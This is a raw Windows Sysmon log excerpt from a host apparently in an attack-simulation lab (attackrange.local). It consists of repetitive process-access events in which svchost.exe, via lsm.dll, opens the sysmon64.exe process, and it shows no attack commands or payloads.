09:20:17.890{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053492Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.890{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053491Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.890{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053490Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.890{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053489Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.890{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053488Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.890{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053487Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.890{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053486Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.890{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053485Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.890{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053484Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.874{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053483Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.874{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053482Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.874{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053481Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.874{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053480Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.874{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053479Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.874{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053478Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.874{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053477Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.874{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053476Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.874{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053475Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.859{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053474Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.859{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053473Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.859{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053472Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.859{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053471Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.859{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053470Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.859{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053469Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 